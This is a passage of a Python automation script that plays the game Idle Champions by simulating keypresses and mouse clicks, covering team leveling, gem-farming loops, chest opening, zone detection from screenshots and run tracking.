# jarlaxle or stoki (slot 4)
drag_image('familiar.png', -120, 165)
if familiars <= 10:
return
# Deekin (slot 1)
# drag_image('familiar.png', -450, 165)
pyautogui.keyUp("f")
SPECS = {
"1_of_2": {"x": 515, "y": 585},
"2_of_2": {"x": 760, "y": 585},
"1_of_3": {"x": 384, "y": 585},
"2_of_3": {"x": 635, "y": 585},
"3_of_3": {"x": 885, "y": 585},
}
TEAM_DEFINITIONS = {
# Speedsters
"briv": {"key": "f5", "bs": 19, "as": 30, "spec": "1_of_3", "short":"-B",},
"shandie": {"key": "f6", "bs": 24, "as": 30, "spec": "1_of_3", "short":"-S",},
"havi": {"key": "f10", "bs": 21, "as": 0, "spec": "1_of_2", "short":"-H",},
"deekin": {"key": "f1", "bs": 16, "as": 0, "spec": "3_of_3", "short":"-D",},
"melf": {"key": "f12", "bs": 12, "as": 30, "spec": "2_of_3", "short":"-M",},
"sentry": {"key": "f4", "bs": 20, "as": 30, "spec": "2_of_3", "short":"-Y",},
"hew": {"key": "f8", "bs": 15, "as": 30, "spec": "2_of_2", "short":"-W",},
# Extras
"viper": {"key": "f7", "bs": 12, "as": 30, "spec": "2_of_2", },
"binwin": {"key": "f3", "bs": 21, "as": 30, "spec": "2_of_2", },
"drizzt": {"key": "f9", "bs": 19, "as": 30, "spec": "1_of_2", },
"omin": {"key": "f3", "bs": 20, "as": 70, "spec": "2_of_3", },
"jarlaxle":{"key": "f4", "bs": 12, "as": 30, "spec": "2_of_2", },
# fix
"minsc": {"key": "f7", "bs": 4, "as": 30, "spec": "2_of_2", },
"strix": {"key": "f11", "bs": 16, "as": 30, "spec": "3_of_3", },
"hitch": {"key": "f7", "bs": 4, "as": 30, "spec": "2_of_2", },
}
def level_champ_with_keys(args, champ, between_champs=0.1):
if champ not in TEAM_DEFINITIONS:
print('ERROR: champ "%s" has no definition for F Key leveling' % champ)
return None
definition = TEAM_DEFINITIONS[champ]
verbose_print("Leveling %s %s" % (champ, definition))
for c in range(0,definition['bs']):
pyautogui.press(definition['key'])
time.sleep(DEFAULT_DELAY)
if not args.modron_specialization:
spec = SPECS[definition["spec"]]
click_spec_at(spec["x"], spec["y"], delay=0.3, tag=champ)
time.sleep(between_champs)
return definition["key"]
def level_team_with_keys(args, team, between_champs=0.1):
have_shandie = ("shandie" in team)
have_hew = ("hew" in team)
leveling_keys = []
if have_shandie:
key = level_champ_with_keys(args, "shandie", between_champs=between_champs)
leveling_keys.append(key)
if "havi" in team:
key = level_champ_with_keys(args, "havi", between_champs=between_champs)
leveling_keys.append(key)
# fire ult! once
pyautogui.press("1")
if have_shandie:
pyautogui.press("2")
for champ in team.split(','):
champ = champ.strip()
if champ in ["shandie", "havi"]:
continue
key = level_champ_with_keys(args, champ, between_champs=between_champs)
leveling_keys.append(key)
# TODO: wait here for shandie to start dashing ...
# Load the Formation
pyautogui.press('q')
time.sleep(DEFAULT_DELAY)
pyautogui.press('g')
time.sleep(DEFAULT_DELAY)
# more rounds of leveling based on those F keys
for i in range(0, 20):
for f_key in leveling_keys:
pyautogui.press(f_key)
if have_hew:
for i in range(0, 20):
pyautogui.press(args.hew_ult)
time.sleep(0.1)
return leveling_keys
def click_third_spec(delay=0.0):
if click_image("select.png", click_image_index=2):
pyautogui.moveRel(0, -120, duration=0.1)
time.sleep(delay)
def click_second_spec(delay=0.0):
if click_image("select.png", click_image_index=1):
pyautogui.moveRel(0, -120, duration=0.1)
time.sleep(delay)
def click_first_spec(delay=0.0):
click_image("select.png")
pyautogui.moveRel(0, -120, duration=0.1)
time.sleep(delay)
return
pyautogui.moveRel(550, 0, duration=0.1)
for i in range(0, 8):
pyautogui.click()
def click_with_position(image, target, offset_x=0, offset_y=0, click=True):
verbose_print("click_with_position(%s,%s)" % (image, str(target)))
if not target:
time.sleep(0.2)
target = locate(image)
pyautogui.moveTo(target.x+offset_x, target.y+offset_y, duration=0.0)
time.sleep(0.1)
if click:
pyautogui.click()
time.sleep(0.2)
return target
def handle_extras(args):
if args.F1:
pyautogui.press("f1")
if args.F2:
pyautogui.press("f2")
if args.F3:
pyautogui.press("f3")
if args.F4:
pyautogui.press("f4")
if args.F5:
pyautogui.press("f5")
if args.F6:
pyautogui.press("f6")
if args.F7:
pyautogui.press("f7")
if args.F8:
pyautogui.press("f8")
if args.F9:
pyautogui.press("f9")
if args.F10:
pyautogui.press("f10")
if args.F11:
pyautogui.press("f11")
if args.F12:
pyautogui.press("f12")
def get_bool_config(cfg, key, default):
try:
return bool(distutils.util.strtobool(cfg['idler'][key]))
except Exception:
return default
def add_champs_to_parser(parser):
for name, v in TEAM_DEFINITIONS:
lc = name.lower()
parser.add_argument("--"+lc, help="Use "+name,
default=False,
dest="use_"+lc,
action="store_true")
parser.add_argument("--no-"+lc, help="Don't use "+name,
dest="use_"+lc,
action="store_false")
def load_config():
global config, top_x, top_y
# Load defaults
defaults = "./defaults.cfg"
if not os.path.exists(defaults):
print("Missing %s file" % defaults)
sys.exit(0)
config.read(defaults)
# load local overrides
local = "./local.cfg"
if os.path.exists(local):
config.read(local)
# Get the .idler overrides, these should be what was created by ./idler.py init
config_path = os.path.join(Path.home(), '.idler')
if os.path.exists(config_path):
config.read(config_path)
if config.getboolean("idler", "use_top_hint"):
top_x = config.getint("idler", "top_hint_x")
top_y = config.getint("idler", "top_hint_y")
verbose_print("Config top_x,top_y = %d,%d" % (top_x, top_y))
# object to support logging all of tracking logs to a permanent file
class Tee(object):
def __init__(self, name, mode):
self.file = open(name, mode)
self.stdout = sys.stdout
sys.stdout = self
def __del__(self):
sys.stdout = self.stdout
self.file.close()
def write(self, data):
self.file.write(data)
self.stdout.write(data)
def flush(self):
self.file.flush()
# object to support logging all of tracking logs to a permanent file
class Tracker(object):
file = None
started = False
verbose = False
zones = None
bosses_per_run = None
start_of_session = None
total_runs = 0
start_of_run = None
longest_run = None
bosses_this_session = None
def __init__(self, now, zones=0, verbose=False, logfile=None, log_mode="a"):
self.start_of_session = None
self.start_of_run = None
self.zones = zones
self.bosses_per_run = self.zones / 5
self.bosses_this_session = 0
self.total_runs = 0
self.started = False
if logfile:
self.file = open(logfile, log_mode)
def elapsed(self, td):
seconds = td.total_seconds()
hours = seconds // 3600
minutes = (seconds % 3600) // 60
seconds = seconds % 60
return hours, minutes, seconds
def start_loop(self, now, level, plus):
if not self.started:
self.start_of_run = now
self.start_of_session = now
self.started = True
return
self.total_runs += 1
print("Loop %d started: %s: %d%s" % (self.total_runs, now, level, "+" if plus else ""))
self.bosses_this_session += self.bosses_per_run
run_elapsed = now - self.start_of_run
run_bph = float(self.bosses_per_run) / float(run_elapsed.total_seconds()) * 60.0 * 60.0
run_hours, run_minutes, run_seconds = self.elapsed(run_elapsed)
session_elapsed = now - self.start_of_session
session_bph = float(self.bosses_this_session) / float(session_elapsed.total_seconds()) * 60.0 * 60.0
session_hours, session_minutes, session_seconds = self.elapsed(session_elapsed)
print("Session: %d:%d:%d BPH: %.2f Run: %d:%d:%d BPH: %.2f" % (
session_hours, session_minutes, session_seconds,
session_bph,
run_hours, run_minutes, run_seconds,
run_bph,
))
self.start_of_run = now
def flush(self):
self.file.flush()
def start_tracking(self, now, level, plus):
print("Gem farming session started: %s: with detected level %d%s" % (now, level, "+" if plus else ""))
epilog="""Commands:
The following commands are available:
1. Gem Farming with or without Modron Automation (see README for more details):
./idler.py modron
./idler.py no-modron
2. Buying bounties quickly, the following commands will by 50 bounties of the given type:
./idler.py small 5
./idler.py medium 5
3. Opening silver chests quickly, the following command will open 5 batches of 50 silver chests:
./idler.py silver 5
4. Quick reset stacking, assuming Briv is at a level where he can no longer advance:
./idler.py --charge 15 stack 5
"""
def main_method():
global top_x, top_y, top_offset, debugging, verbose, infinite_loop
load_config()
# get defaults from config file
# have_briv = get_bool_config(config, "use_briv", have_briv)
# have_havilar = get_bool_config(config, "use_havilar", have_havilar)
# have_binwin = get_bool_config(config, "use_binwin", have_binwin)
# have_deekin = get_bool_config(config, "use_deekin", have_deekin)
# have_sentry = get_bool_config(config, "use_sentry", have_sentry)
# have_shandie = get_bool_config(config, "use_shandie", have_shandie)
# have_melf = get_bool_config(config, "use_melf", have_melf)
# have_hew = get_bool_config(config, "use_hew", have_melf)
steam_start_with_image = get_bool_config(config, "steam_start_with_image", True)
steam_start_x = get_bool_config(config, "steam_start_x", True)
default_charge_time = config.getfloat("idler", "briv_charge_time")
briv_restart_charging = config.getboolean("idler", "briv_restart_charging")
briv_boss_handling = config.getboolean("idler", "briv_boss_handling")
level_images = load_level_images()
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent(epilog)
)
parser.add_argument("--tee", help="Also send output to a logfile (appending)",
default=None,
type=str)
parser.add_argument("--keyboard-shutdown",
dest="keyboard_shutdown",
default=config.getboolean("idler", "keyboard_shutdown"),
help="Shutdown %s by sending CMD-Q" % APP_NAME, action="store_true")
parser.add_argument("--no-keyboard-shutdown", "--close",
dest="keyboard_shutdown",
help="Shutdown %s by closing the app." % APP_NAME,
action="store_false")
# meta
parser.add_argument("-m", "--mirt", help="Set reasonable defaults for a Mirt run (no Deekin)",
action="store_true")
parser.add_argument("-v","--vajra", help="Set reasonable defaults for a Vajra run (no Minsc)",
action="store_true")
parser.add_argument("-a", "--adventure", default=DEFAULT_ADVENTURE,
help="Adventure to run (madwizard, terror) (default %s)" % DEFAULT_ADVENTURE,
type=str)
parser.add_argument("-f", "--familiars", default=NUM_FAMILIARS,
help="How many familiars do you have (default %d)" % NUM_FAMILIARS, type=int)
parser.add_argument("--target", default=config.getint("idler", "modron_target"),
help="What zone is your Modron core set to restart (default %d)" % config.getint("idler", "modron_target"),
type=int)
parser.add_argument("--briv-recharge-areas", "--briv-areas", default=config.getint("idler", "briv_recharge_areas"),
help="How many areas before your Modron area goal should Briv start recharging (default is %s which works for Triple Skip Briv, use 15 for Quad skip Briv)" % config.getint("idler", "briv_recharge_areas"),
type=int)
parser.add_argument("--charge", default=default_charge_time,
help="Amount of time for Briv charging, either method (default %f)" % default_charge_time,
type=float)
parser.add_argument("--no-boss", default=default_charge_time,
help="Amount of time for Briv charging, either method (default %f)" % default_charge_time,
type=float)
#how to spec
parser.add_argument("--specialization", default=config.getboolean("idler", "modron_specialization"),
dest="modron_specialization",
help="Specialization automaticaly done by modron.",
action="store_true")
parser.add_argument("--no-specialization", "--fkeys",
dest="modron_specialization",
help="Specialization not automaticaly done by modron.",
action="store_false")
#skip boss
parser.add_argument("--briv-boss", default=briv_boss_handling,
dest="briv_boss",
help="Remove Briv if on a boss (Quad Briv) via formation 'e'",
action="store_true")
parser.add_argument("--no-briv-boss",
dest="briv_boss",
help="No special handling for Briv on bosses",
action="store_false")
#restart
parser.add_argument("--restart", default=briv_restart_charging,
dest="restart",
help="Briv charging via quit/restart",
action="store_true")
parser.add_argument("--no-restart", help="Briv charging by waiting.",
dest="restart",
action="store_false")
parser.add_argument("--charge-shandie", default=config.getint("idler", "charge_shandie"),
dest="charge_shandie",
help="Charge Shandie's dash on startup (default %d seconds)" % 0,
type=int)
parser.add_argument("--size", default="small",
help="Size of bounties to open (small or medium,default small)",
type=str)
parser.add_argument("-r", "--runloops", default=GEM_LOOPS,
help="How many loops gem run (default %d)" % GEM_LOOPS,
type=int)
parser.add_argument("-l", "--level", default=DEFAULT_LEVEL_DELAY,
help="How many seconds to wait before leveling champs (default %d)" % DEFAULT_LEVEL_DELAY,
type=int)
parser.add_argument("--F1", help="Activate slot 1st hero (1 level).", action="store_true")
parser.add_argument("--F2", help="Activate slot 2nd hero (1 level).", action="store_true")
parser.add_argument("--F3", help="Activate slot 3rd hero (1 level).", action="store_true")
parser.add_argument("--F4", help="Activate slot 4th hero (1 level).", action="store_true")
parser.add_argument("--F5", help="Activate slot 5th hero (1 level).", action="store_true")
parser.add_argument("--F6", help="Activate slot 6th hero (1 level).", action="store_true")
parser.add_argument("--F7", help="Activate slot 7th hero (1 level).", action="store_true")
parser.add_argument("--F8", help="Activate slot 8th hero (1 level).", action="store_true")
parser.add_argument("--F9", help="Activate slot 9th hero (1 level).", action="store_true")
parser.add_argument("--F10", help="Activate slot 10th hero (1 level).", action="store_true")
parser.add_argument("--F11", help="Activate slot 11th hero (1 level).", action="store_true")
parser.add_argument("--F12", help="Activate slot 12th hero (1 level).", action="store_true")
parser.add_argument("--modron", help="Depend on Modron to reset and level.",
default=config.getboolean('idler', 'use_modron'),
dest="use_modron",
action="store_true")
parser.add_argument("--no-modron", help="Manual resetting of levels.",
dest="use_modron",
action="store_false")
parser.add_argument("--save_mismatch", help="When checking level, save any mismatches.",
action="store_true")
parser.add_argument("--in-progress", help="Start up with a game in progress.",
action="store_true")
parser.add_argument("-O", "--odds", help="Briv odds of jumping",
type=float, default=99.0)
parser.add_argument("--header", help="Height of the Idle Champions application header",
type=int,
default=config.getint("idler", "header_height"))
parser.add_argument("--countdown",
help="Seconds to wait before starting command (default %d)" % COUNTDOWN,
type=int,
default=COUNTDOWN, )
parser.add_argument("-c", "--confirm_buy", help="Confirm buying gold chests (skips Yes/No prompt).",
action="store_true")
parser.add_argument("-x", "--experimental", help="Don't use this.",
action="store_true")
parser.add_argument("--verbose", help="Debugging aid.", action="store_true")
parser.add_argument("--debug", help="Debugging aid, very noisy.", action="store_true")
parser.add_argument("--screenshare", "--ss",
help="Screen share accept active.",
action="store_true")
parser.add_argument('-F', '--formation', metavar='formation', type=str,
help="Formation key to use to set initial formations and familiars",
default=None)
parser.add_argument("--havi-ult", default=config.get('idler', 'havi_ult'),
help="Key that hits Havi's ult. (default %s)" % config.get('idler', 'havi_ult'),
type=str)
parser.add_argument("--hew-ult", default=config.get('idler', 'hew_ult'),
help="Key that hits Hews's ult. (default %s)" % config.get('idler', 'hew_ult'),
type=str)
# Commands and arguments
parser.add_argument('command', metavar='command', type=str, nargs="?",
help="""Action to perform (modron, stats, run, silver, stack, bounty, keep-alive)
run: loop on adventures for N minutes to acquire gems and/or patron currency
press: press the specified key every few seconds
buy: buy N gold chests """, default="stats")
parser.add_argument('loops', metavar='N', type=int, nargs="?",
help="""Argument (N) to the action (number of chests/minutes)""",
default=0)
parser.add_argument('extras', metavar='N', type=int, nargs="*",
help="""Argument (N+) to the action (e.g. bs contracts)""",
default=0)
args = parser.parse_args()
verbose = args.verbose
debugging = args.debug
verbose_print("Command = %s" % args.command)
debug_print("Debugging On")
top_offset = args.header
patron = "None"
speed_team = config.get("idler", "speed_team")
if args.tee:
Tee(args.tee, "a")
if args.vajra:
speed_team = config.get("idler", "vajra_speed_team")
patron = "Vajra"
if args.mirt:
speed_team = config.get("idler", "mirt_speed_team")
patron = "Mirt"
# Apply args to speed team
have_briv = False
if "briv" in speed_team:
have_briv = True
champs_list = []
if have_briv:
champs_list.append("briv")
if have_celeste:
champs_list.append("celeste")
if have_donaar:
champs_list.append("donaar")
if have_deekin:
champs_list.append("deekin")
if have_shandie:
champs_list.append("shandie")
if have_melf:
champs_list.append("melf")
if have_minsc:
champs_list.append("minsc")
if have_viper:
champs_list.append("viper")
if have_binwin:
champs_list.append("binwin")
if have_havilar:
champs_list.append("havilar")
if have_sentry:
champs_list.append("sentry")
if have_gold:
champs_list.append("[gold]")
champs = ",".join(champs_list)
if args.screenshare:
print("Sreenshare mode!")
if args.command == "pytest":
print("merged: %s" % list(pyautogui.locateAllOnScreen('./merged.png')))
print("merged2: %s" % list(pyautogui.locateAllOnScreen('./merged2.png')))
print("merged3: %s" % list(pyautogui.locateAllOnScreen('./merged3.png')))
sys.exit(0)
if args.command == "stats":
player_stats = load_player_json()
dump_stats(args, player_stats)
print("Champs you can put in your team:")
champs = ",".join([key for key in TEAM_DEFINITIONS.keys()])
print(" %s" % champs)
sys.exit(0)
if args.command == "init":
print("Configuring system, this will take a minute or two ...")
time.sleep(5)
init_config_path = os.path.join(Path.home(), '.idler')
init_config = configparser.ConfigParser(allow_no_value=True)
if os.path.exists(init_config_path):
print("Updating ~/.idler file")
init_config.read(init_config_path)
else:
print("Creating ~/.idler file")
if not config.getboolean("idler", "shortcut_restarting"):
print("Looking for the steam app")
# move mouse to top corner
steam = activate_app("Steam")
time.sleep(1)
# click [Play] or [Stop]
print("Looking for Play or Stop")
try:
location = locate("steam_play.png", "steam_stop.png")
if "steam" not in init_config:
init_config.add_section("steam")
init_config["steam"]["; middle pixel of the Idle Champions [play] button on Steam"] = None
init_config["steam"]["start_with_image"] = "no"
init_config["steam"]["start_x"] = str(int(location.x))
init_config["steam"]["start_y"] = str(int(location.y))
print("Found Steam Play/Stop Location: %s" % str(location))
except Exception as e:
print("Error finding Steam Play/Stop location: %s" % str(e))
print("Hover over the blue menu icon in the top left corner of the Idle Champions game. Do not click!")
time.sleep(5.0)
print("Looking for the %s app" % APP_NAME)
ic_app = activate_app(APP_NAME)
time.sleep(1)
for tries in range(0, 2):
try:
# location = locate("menu.png")
# top_x, top_y = top_location_from_menu(int(location.x), int(location.y))
print("Screen shot in ", end='')
for i in range(10,0,-1):
print('%d ...' % i, end='', flush=True)
time.sleep(1)
top_x, top_y, found = hunt_for_menu(level_images)
if not found:
continue
if "idler" not in init_config:
init_config.add_section("idler")
init_config["idler"]["; top left pixel of the app when launched"] = None
init_config["idler"]["use_top_hint"] = "yes"
init_config["idler"]["top_hint_x"] = str(top_x)
init_config["idler"]["top_hint_y"] = str(top_y)
print("Found app top x,y: %d,%d" % (top_x, top_y))
break
except Exception as e:
print("Error finding Menu Icon location: %s" % str(e))
print("Checking init with current zone ...")
level, plus = get_current_zone(level_images=level_images, save=True, tries=1)
if level > 0:
print("Zone found %d (at start zone: %s), (on_boss: %s)" % (level, plus, on_boss()))
else:
print("Zone not found, check again with ./idler.py zone")
print("Updating ~/.idler.py")
with open(init_config_path, 'w') as f:
f.write("# created by idler.py, a Idle Champions script engine\n")
f.write("# Warning: edit at on risk\n")
init_config.write(f)
sys.exit(0)
if args.command == "Tracker" or args.command == "Track":
print("Test Tracker ...")
try:
now = datetime.datetime.now()
tracker = Tracker(now=now-datetime.timedelta(minutes=11, seconds=12),
zones=args.target,
verbose=verbose,)
print("start track %s" % now)
tracker.start_tracking(now, 20, False)
print("start loop %s" % now)
tracker.start_loop(now, 221, False)
now = now + datetime.timedelta(minutes=11, seconds=12)
print("start loop %s" % now)
tracker.start_loop(now, 1, False)
now = now + datetime.timedelta(minutes=10, seconds=33)
print("start loop T %s" % now)
tracker.start_loop(now, 1, True)
now = now + datetime.timedelta(minutes=12, seconds=1)
print("start loop %s" % now)
tracker.start_loop(now, 6, False)
except Exception as e:
print("Error: %s" % str(e))
sys.exit(0)
if args.command == "testhunt":
print("Test Hunt for Menu ...")
print("Screen shot in ", end='')
for i in range(10,0,-1):
print('%d ...' % i, end='', flush=True)
time.sleep(1)
for round in range(0,5):
print("")
print("######## Round %d ############" % round)
x, y, found = hunt_for_menu(level_images)
if round == 4:
break
print("Next screen shot in ", end='')
for i in range(5,0,-1):
print('%d ...' % i, end='', flush=True)
time.sleep(1)
sys.exit(0)
if args.command == "mouse":
print("You have 5 seconds to hover ...")
time.sleep(5)
pos = pyautogui.position()
print("raw mouse: %s" % str(pos))
off_x, off_y = print_reverse_without_offset(int(pos.x), int(pos.y))
print("offset from top_x,top_y = %d, %d" % (off_x, off_y))
sys.exit(0)
if args.command == "zone":
print("Looking for the %s app" % APP_NAME)
time.sleep(1)
found_app = activate_app(APP_NAME, reset_top=True)
time.sleep(1)
finder = LevelFinder()
level, plus = finder.get_current_zone(True)
print("Zone found %d (at start zone: %s), (on_boss: %s)" % (level, not plus, on_boss()))
if level <= 0:
print("Could not find zone, zone image saved in my_screenshot*.png")
found, grey = check_for_menu()
print("Menu found=%s greyed out=%s" % (found, grey))
sys.exit(0)
no_modron_commands = ["run", "no-core", "no-modron", ]
if args.command in no_modron_commands:
if args.use_modron:
print("WARNING: Modron mode enabled but you are using the No Modron run command.")
print("Patron:%s / Familiars:%d / Minutes:%d / Team:%s (CTRL-C to stop)" % (
patron, args.familiars, args.loops, speed_team))
if args.command == "buy":
confirmation_msg = ""
if not args.confirm_buy:
confirmation_msg = "type Y to buy or N/"
msg = ("Buy %d gold chests for %d gems (%sCTRL-C to stop)" % (
args.loops, args.loops * 500, confirmation_msg))
if args.confirm_buy:
print(msg)
else:
agreed = query_yes_no(msg, default="no")
if not agreed:
sys.exit(1)
while args.command == "goto":
pyautogui.moveTo(1400, 50, duration=2.0)
pyautogui.click()
pyautogui.moveTo(924, 292, duration=2.0)
pyautogui.click()
time.sleep(5.0)
print("mouse: %s" % str(pyautogui.position()))
if args.command == "bs":
tiny = args.loops
small = args.extras[0]
medium = args.extras[1]
large = args.extras[2]
ilvls = tiny * 1 + small*2 + medium * 6 + large * 24
print("tiny=%d x 1 small=%d x 2 medium=%d x 6 large=%d x 24 = %d ilvls" % (
tiny,small,medium,large, ilvls,
))
sys.exit(1)
if args.command == "bc":
small = args.loops
medium = args.extras[0]
large = args.extras[1]
tokens = small*72 + medium * 576 + large * 1152
runs = tokens / 2500
print("small=%d x 72 medium=%d x 576 large=%d x 1152 = %d tokens (%d runs)" % (
small,medium,large, tokens, runs
))
sys.exit(1)
reduction = 0.032
if args.command == "briv4":
reduction = 0.04
args.command = "briv"
if args.command == "briv3":
args.command = "briv"
while args.command == "briv":
stacks = float(args.loops)
jumps = 0
print("stacks=%f jumps=%d odds=%f percent=%f" % (stacks, jumps, args.odds, reduction))
while stacks > 50.0:
stacks -= stacks * reduction
stacks = math.floor(stacks)
skipped = jumps * 3
levels = jumps * 3 + float(jumps) / args.odds * 100.0
print("stacks=%f jumps=%d skipped=%d levels=%d" % (
stacks, jumps, skipped, levels))
jumps += 1
sys.exit(1)
if args.command == "check":
print("Test Startup Complete")
check_for_menu()
sys.exit(0)
while args.command == "cmp":
im1 = Image.open("011.png").convert('RGB')
im2 = Image.open("levels/011.png").convert('RGB')
diff = ImageChops.difference(im1, im2)
result = ImageStat.Stat(diff)
print("mean=%s" % str(result.mean))
print("rms=%s" % str(result.rms))
diff.save('diff.png')
if diff.getbbox():
print("Not same, check diff.png, %s" % str(diff.getbbox()))
else:
print("Same")
sys.exit(1)
if args.command == "repair_shortcut":
result = repair_shortcut()
sys.exit(0 if result else 1)
# Commands above this line don't require Idle Champions to be running
# ########################################################################
# Start idle champions and foreground it
print("Starting/Foregrounding Idle Champions")
if args.countdown > 0:
print("Script will start in ...", end='', flush=True)
for s in range(args.countdown, 0, -1):
print(" %d ..." % s, end='', flush=True)
time.sleep(1.0)
print("now")
foreground_or_start(tries=5)
time.sleep(1.0)
# TODO: check that top_x and top_y have been set
verbose_print("Using top_x,top_y = %d,%d" % (top_x, top_y))
loops = 0
crashes = 0
# ########################################################################
# Commands below this line require Idle Champions to be running
while args.command == "complete":
loops += 1
complete = zone_complete(save_images=True, fast=True)
if complete:
print("zone complete")
else:
print("zone incomplete")
if loops > 10000:
sys.exit(0)
if args.command == "testfkey":
print("level_team_with_keys(args,[%s])" % speed_team)
level_team_with_keys(args,speed_team, between_champs=1.0)
sys.exit(0)
if args.command == "teststart":
print("Test Startup Complete")
sys.exit(0)
while args.command == "zap":
pyautogui.press("e")
time.sleep(5.0)
while args.command == "keep-alive":
time.sleep(args.loops)
print("Checking for game at %s" % datetime.datetime.now())
foreground_or_start()
continue
while args.command == "goto":
pyautogui.moveTo(2028, 20, duration=2.0)
print("mouse: %s" % str(pyautogui.position()))
break
if args.command == "bounty" or args.command == "small" or args.command == "medium":
start_image = "bountysmall.png"
bounty_size = "small"
if args.command == "medium" or args.size == "medium":
bounty_size = "medium"
start_image = "bountymedium.png"
print("Buying %s bounties of size %s" % (args.loops, bounty_size))
# Inventory Region
region = region_for_screenshot(350, 170, 565, 325)
try:
bounty_target = locate(start_image, search_region=region)
except Exception:
print("Error: could not find bounty image %s: is the inventory open?" % (start_image))
sys.exit(1)
if not bounty_target:
print("Error: could not find bounty image %s: is the inventory open?" % (start_image))
sys.exit(1)
# use offset instead of image find ...
bar_target = with_top_offset(742, 386, as_point=True)
go_target = with_top_offset(555, 432, as_point=True)
while True:
move_to_menu()
loops += 1
print("Buying bounty %d of %d" % (loops, args.loops))
bounty_target = click_with_position(start_image, bounty_target)
time.sleep(0.25)
bar_target = click_with_position("bountybar.png", bar_target)
time.sleep(0.25)
go_target = click_with_position("bountygo.png", go_target)
# drops can take a while to process, give it sec or two
if loops >= args.loops:
sys.exit(0)
time.sleep(1.5)
sys.exit(0)
if args.command == "silver" or args.command == "gold":
mouse_move_speed = 0.5
time.sleep(mouse_move_speed)
inventory_target = None
bar_target = None
go_target = None
flip_target = None
done_target = None
while True:
loops += 1
print("Opening 50 silver chests batch %d of %d" % (loops, args.loops))
# inventory_target = click_with_position("openinventory.png", inventory_target, 40, 100)
# move_to_menu()
# time.sleep(2)
click_offset(132, 126, duration=mouse_move_speed, delay=0.5)
# bar_target = click_with_position("bountybar.png", bar_target)
click_offset(744, 385, duration=mouse_move_speed, delay=0.5)
# go_target = click_with_position("openopen.png", go_target, click=False)
delay = 2.5
if args.command == "gold":
delay = 4.5
click_offset(551, 431, duration=mouse_move_speed, delay=delay)
# flip_target = click_with_position("openflip.png", flip_target)
click_offset(726, 359, duration=mouse_move_speed, delay=delay)
# click in same place for show all
# flip_target = click_with_position("openflip.png", flip_target)
click_offset(726, 359, duration=mouse_move_speed, delay=2.5)
# done_target = click_with_position("opendone.png", done_target)
pyautogui.press("esc")
# pyautogui.moveRel(300, 0, duration=0.0)
time.sleep(0.5)
if loops >= args.loops:
sys.exit(1)
while args.command == "testimages":
level, plus = get_current_zone(level_images, args.save_mismatch)
if level > 0:
print("zone found %d, %s, %s" % (level, plus, on_boss()))
else:
print("not found")
print("sleeping ... ")
time.sleep(3.0)
if args.command == "stack":
for s in range(args.loops, 0, -1):
print("===== Stacking: %d to go (charge_time=%d) =====" % (s, args.charge))
restart_stacking(args)
if s > 1:
time.sleep(15.0)
sys.exit(0)
if args.command == "testboss":
time.sleep(2.0)
is_on_boss = on_boss()
print("on boss = %s" % is_on_boss)
sys.exit(0)
if args.command == "testzone":
print("Testing zone detection")
found_app = activate_app(APP_NAME)
print("%s" % str(found_app))
print("%d,%d" % (found_app.left, found_app.top))
print("Configured top_x,top_y = %d,%d" % (top_x, top_y))
top_x, top_y = found_app.left+1, found_app.top+top_offset
print("new top_x,top_y = %d,%d" % (top_x, top_y))
level, plus = get_current_zone(level_images, True, tries=3)
if level <= 0:
sys.exit("Cound not find zone, saved in my_screenshot*.png")
print("Zone found %d (at start zone: %s), (on_boss: %s)" % (level, plus, on_boss()))
sys.exit(0)
if args.command == "legacyzone":
print("Legacy zone detection")
x, y = get_menu(tries=10)
region = get_level_region()
print("%d, %d vs %s" % (x, y, region))
level, plus = get_current_level(x, y, level_images, args.save_mismatch)
print("old %s, %s" % (level, plus))
sys.exit(0)
if args.command == "jimmy":
finder = LevelFinder()
for i in range(1,args.loops+1):
now = datetime.datetime.now()
print("Jimmy loops %d of %d (%s)" % (i, args.loops, str(now)))
pyautogui.press('g')
time.sleep(0.5)
pyautogui.press('w')
time.sleep(3.0)
pyautogui.press('e')
# level, plus = finder.get_current_zone()
# need images for the above
level = 1000
if level >= 1490:
print("Jimmy exiting at level %d" % (level))
pyautogui.press('left')
pyautogui.press('left')
pyautogui.press('left')
pyautogui.press('left')
pyautogui.press('left')
pyautogui.press('left')
pyautogui.press('left')
sys.exit(0)
time.sleep(args.charge)
# click back to 1
for j in range(0,4):
pyautogui.keyDown('shift')
time.sleep(0.1)
click_offset(924, 105)
pyautogui.keyUp('shift')
time.sleep(1.0)
click_offset(971, 106)
time.sleep(3.0)
pyautogui.keyDown('shift')
time.sleep(0.1)
click_offset(924, 105)
pyautogui.keyUp('shift')
time.sleep(1.0)
click_offset(971, 106)
pyautogui.keyUp('shift')
time.sleep(args.charge)
sys.exit(0)
if args.command == "modron":
infinite_loop = True
# try:
# verified = verify_menu(update=False)
# except Exception:
# print("ERROR: Can't verify menu location. Exiting.")
print("Modron Gem Farming: Briv recharge=%d; modron goal=%d; charge=%f seconds; havi ult=%s; hew ult=%s shandie=%ds" % (
args.target-args.briv_recharge_areas,
args.target,
args.charge, args.havi_ult, args.hew_ult,
args.charge_shandie
))
finder = LevelFinder()
print("(Hit CTRL-C to stop or move mouse to the corner of the screen)")
need_havi_ult = True
need_recharge = True
log_restarted = False
need_leveling = not config.getboolean("idler", "familiar_leveling")
log_initial = True
last_level = -1
now = datetime.datetime.now()
tracker = Tracker(now=now,
zones=args.target,
verbose=verbose,)
last_level_time = now
while True:
now = datetime.datetime.now()
try:
level, plus = finder.get_current_zone(save=args.save_mismatch)
if verbose and not debugging:
print("Zone found %d (at start zone: %s)" % (level, plus))
if debugging:
print("Zone found %d (at start zone: %s), (on_boss: %s)" % (level, plus, on_boss()))
except Exception as e:
print("Error getting current level: %s" % str(e))
level = -2
plus = False
verbose_print("Level %d" % level)
if log_initial:
tracker.start_tracking(now, level, plus)
log_initial = False
# check for stalled or hung game
if last_level == level and level > 0:
# check delta
delta = (now - last_level_time).total_seconds()
if delta > 45:
# try 'q' 'g' to see if it unsticks
pyautogui.press('q')
pyautogui.press('g')
pyautogui.press('q')
if delta > 90:
print("Error stuck at zone %s at %s for %d seconds ..." % (level, datetime.datetime.now(), delta))
# kill the app and restart
shutdown_app(args.keyboard_shutdown)
# attempt restart below
level = -1
else:
last_level = level
last_level_time = now
if level <= 0:
try:
verbose_print("Error: is restart needed?")
accept_screen_share(args.screenshare)
foreground_or_start()
# TODO: Need to be able to see if in auto or ran by end zone or ... or maybe if stuck triggered?
# time.sleep(1.0)
# pyautogui.press("g")
except Exception as e:
print("Error restarting... wait and try again %s" % str(e))
time.sleep(10.0)
